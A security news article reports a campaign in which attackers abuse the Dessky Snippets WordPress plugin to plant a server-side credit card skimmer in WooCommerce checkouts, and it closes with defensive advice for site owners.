Unknown threat actors exploit WordPress plugin to steal credit card data. Stay vigilant against malicious code snippets.
Unknown threat actors abusing lesser-known code snippet plugins for WordPress to insert malicious PHP code in victim sites
Unknown threat actors have recently been observed exploiting lesser-known code snippet plugins for WordPress to insert malicious PHP code into victim sites. This campaign, which was discovered by Sucuri on May 11, 2024, involves the abuse of a WordPress plugin called Dessky Snippets. This plugin, which has over 200 active installations, allows users to add custom PHP code to their websites.
These attacks typically take advantage of previously disclosed vulnerabilities in WordPress plugins or easily guessable credentials to gain administrator access to the target site. Once access is obtained, the attackers install other plugins, both legitimate and malicious, for further exploitation. In this particular campaign, the Dessky Snippets plugin is being used to insert a server-side PHP credit card skimming malware onto compromised sites, enabling the theft of financial data.
According to security researcher Ben Martin, the malicious code is saved in the dnsp_settings option in the WordPress wp_options table. Its purpose is to modify the checkout process in WooCommerce by manipulating the billing form and injecting its own code. The injected code adds several new fields to the billing form, requesting credit card details such as names, addresses, credit card numbers, expiry dates, and Card Verification Value (CVV) numbers. These stolen details are then transferred to a specific URL.
One notable aspect of this campaign is that the billing form associated with the malicious overlay has its autocomplete attribute disabled, specifically set to autocomplete=”off.” This deliberate action reduces the likelihood of the browser warning the user that sensitive information is being entered. By keeping the fields blank until manually filled out by the user, the attackers aim to reduce suspicion and make the fields appear as regular, necessary inputs for the transaction.
It is worth noting that this is not the first time threat actors have exploited legitimate code snippet plugins for malicious purposes. In a previous incident, Sucuri uncovered the abuse of the WPCode code snippet plugin. In that case, the attackers injected malicious JavaScript code into WordPress sites, redirecting site visitors to VexTrio domains.
These incidents highlight the importance of maintaining strong security measures for WordPress sites. It is crucial to regularly update plugins and themes to their latest versions, as developers often release patches to address vulnerabilities. Additionally, using strong and unique passwords for all accounts associated with the website can help prevent unauthorized access.
Website administrators should also consider implementing a web application firewall (WAF) to provide an additional layer of protection against malicious attacks. A WAF can help detect and block suspicious activities, such as the insertion of malicious code through plugins.
The recent campaign involving the abuse of lesser-known code snippet plugins for WordPress serves as a reminder of the ongoing threats faced by website owners. By staying vigilant and implementing robust security measures, site administrators can better protect their websites and the sensitive data of their users.
